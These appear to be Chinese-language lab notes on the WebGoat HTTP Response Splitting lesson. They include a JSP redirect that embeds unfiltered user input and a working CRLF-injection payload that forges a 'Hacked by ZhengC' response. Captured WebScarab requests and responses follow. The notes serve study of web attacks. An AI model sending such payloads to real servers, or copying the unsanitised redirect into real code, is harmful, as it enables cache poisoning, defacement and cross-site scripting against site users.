第一小节:HTTP Basics:使用Proxy软件(例如Webscarab)来截断浏览器(客户端)和Server之间的HTTP通信,之后任意篡改得到预期结果即可。
第二小节:HTTP Splitting:(其实应该为HTTP Response Splitting)
分为两步
1、HTTP Splitting:通过注入HTTP request使得Server返回两个HTTP response(最起码是使得接收到Server返回响应的目标自己认为是接收到了两个HTTP response),而不是一个。通过精心构造这第二个HTTP响应,攻击者可以达到任意目的!该攻击是因为server没有检查非法的数据输入就进行了请求的重定向(code 3x x , "setcookie" 或者 "Location")。
2、Cache Poisoning;
HTTP Response Splitting介绍:
“HTTP Response Splitting” is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and an old favorite, cross-site scripting (XSS). This attack technique, and the derived attacks from it, are relevant to most web environments and is the result of the application’s failure to reject illegal user input, in this case, input containing malicious or unexpected characters.
HTTP Response Splitting漏洞成因:
The HTTP response splitting vulnerability is the result of the application’s failure to
reject illegal user input. Specifically, input containing malicious or unexpected CR
and LF characters.
HTTP Response Splitting攻击发生的前提条件是——Server存在安全漏洞时,即Server没有拒绝客户端的非法输入,并且Server脚本将用户输入的数据直接嵌入了HTTP response headers中。
并且,
HTTP1.1允许客户端和服务器在一个相同的TCP会话中交换多个HTTP请求,而HTTP1.0在每个HTTP交换之前都必需建立一个TCP连接。
HTTP Response Splitting攻击中的角色分析:
1、Web Server(具有可促使HTTP Response Splitting的安全漏洞)
2、Victim Target:一个能与Web Server正常交互的客户端(在WebGoat中也由Attacker来扮演)。可以为一个browser(一般具有浏览器cache)或者一个cache server(forward/reverse proxy)
3、Attacker——发启攻击者
HTTP Response Splitting攻击本质:
The essence of HTTP Response Splitting is the attacker’s ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response, in the normal case. The first response may be partially controlled by the attacker, but this is less important. What is material is that the attacker completely controls the form of the second response from the HTTP status line to the last byte of the HTTP response body. Once this is possible, the attacker realizes the attack by sending two requests through the target. The first one invokes two responses from the web server, and the second request would typically be to some “innocent” resource on the web server. However, the second request would be matched, by the target, to the second HTTP response, which is fully controlled by the attacker. The attacker, therefore, tricks the target into believing that a particular resource on the web server (designated by the second request) is the server’s HTTP response (server content), while it is in fact some data, which is forged by the attacker through the web server – this is the second response.
HTTP Response Splitting攻击简析:
HTTP Response Splitting attacks take place where the server script embeds user data in HTTP response headers. This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
即Server没有拒绝客户端的非法输入,并且Server脚本将用户输入的数据直接嵌入了HTTP response headers中。
server脚本将用户输入数据嵌入到HTTP redirection Response(HTTP status code 3xx)的重定向URL地址中(Location line)或者当response设置cookie时sever脚本将用户输入数据嵌入到cookie value/name中。
例子:
考虑以下JSP页面 (假设在/redir_lang.jsp):
<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>
当使用参数lang=English调用/redir_lang.jsp时,server会自动重定向到/by_lang.jsp?lang=English
HTTP响应和请求包格式(需调研!!!!)
CR = Carriage return ( %0d or /r or A SCII 1 3)
LF = Line Feed (%0a or /n or A SCII 1 0)
http is built as follow:
initial line, ends with CRLF
header lines, ends with CRLF
blank line (= CRLF)
body
因为数据要被解析为HTTP请求因此用CRLF替换LF。
HTTP Response Splitting攻击过程
在Webgoat测试页的输入框中输入畸形数据:
chinese%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0aHacked by ZhengC
可以在http://yehg.net/encoding/#中经URL解码查看数据内容,即:
chinese
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 29
Hacked by ZhengC
这里需要注意的是 构建此畸形数据的时候要符合HTTP请求和响应的包格式。比如HTTP请求和响应都需要用CRLF(即%0d%0a)来隔开数据包的header和body。
而target解析到Content-Length: 0时,认为请求包的body内容为空,因此Content-Length: 0相当于将一个GET请求数据包中间截断为一个内容为0的GET请求和下面的数据包(我们精心构造为一个HTTP200响应)。
Webscarab截获POST请求和Server的Response
需要设置WebScarab
The Request sent to Server is:
POST http://localhost:8080/webgoat/lessons/General/redirect.jsp?Screen=3&menu=100 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:8080/webgoat/attack?Screen=3&menu=100&Restart=3
Cookie: JSESSIONID=2CF8DFAB32C4CF39DB4023D1BB2EF98E
Content-Type: application/x-www-form-urlencoded
Content-length: 245
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
language=chinese%250d%250aContent-Length%3A%25200%250d%250a%250d%250aHTTP%2F1.1%2520200%2520OK%250d%250aContent-Type%3A%2520text%2Fhtml%250d%250aContent-Length%3A%252029%250d%250a%250d%250a%3Chtml%3EHacked+by+ZhengC%3C%2Fhtml%3E&SUBMIT=Search%21
Server sent response(302)to proxy:
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://localhost:8080/webgoat/attack?Screen=3&menu=100&fromRedirect=yes&language=chinese%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0aHacked by ZhengC
Content-Type: text/html;charset=ISO-8859-1
Content-length: 0
Date: Wed, 27 Oct 2010 06:18:13 GMT